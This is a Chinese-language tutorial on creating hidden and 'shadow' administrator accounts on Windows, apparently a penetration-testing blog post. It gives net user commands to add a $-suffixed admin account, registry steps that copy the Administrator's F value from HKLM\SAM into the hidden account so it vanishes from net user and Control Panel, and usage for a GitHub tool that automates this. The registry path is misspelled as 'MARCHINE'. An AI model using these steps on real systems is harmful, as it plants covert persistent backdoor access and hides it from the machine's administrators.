Windows下创建隐藏账户、影子账户

方法一： 用户名后面加$符号

net user test$ password /add

net localgroup administrators test$ /add

此时使用命令net user 查看不到此用户，但使用 wmic命令可以

wmic useraccount get Name

此外，在控制面板也能看到此用户

可直接用命令删除

net user test$ /del

对于此方法，微软官方的回答是

方法二：修改注册表

前提是我们要基于方法一创建一个带$的账户。

win + r ,输入 regedit 打开注册表。路径为：HKEY_LOCAL_MARCHINE\SAM\SAM

默认情况下只有 system用户组 有控制注册表的权限。administrators组没有任何权限。system组是administrator组更高一级的存在，它拥有和administrator组一样甚至更高级的权限。查看用户组时不会显示，也不允许任何账户加入。存在目的是保证系统服务的运行，因此被赋予系统及系统级的权限。

此时打开SAM文件夹是不会显示下面的文件的。我们 右击SAM ，点击权限

赋予administrators组权限

点击应用-->确定。重新打开注册表。此时即可看见SAM的文件内容

此时我们要导出

user下的administrator的隐藏文件，即 1F4

user/name 下test$账户的文件

user下的 test$ 账户的隐藏文件，在name下看到对应的是 3EC

右键导出即可。

用记事本打开1和3，将 administrator注册表文件中的F值覆盖到 test$账户的隐藏文件中去

保存后，删除 test$用户。

net user test$ /del

再双击test的两个注册表文件，将用户再次添加。

此时net user 和控制面板看不到 test$

但 net user test$ 能看到此用户，

注册表和 wmic useraccount get Name 也能看到

而且当电脑重启后，在计算机管理里也能看到刚刚创建的隐藏账号。

工具

项目地址：https://github.com/wgpsec/CreateHiddenAccount

使用方法

管理员权限运行

CreateHiddenAccount_v0.2.exe -c 检查是否有隐藏账户

CreateHiddenAccount_v0.2.exe -u test -p 123 创建名为test，密码为123的账户。会自动补上$

CreateHiddenAccount_v0.2.exe -d test$ 删除隐藏账户

原帖地址：一键创建隐藏账号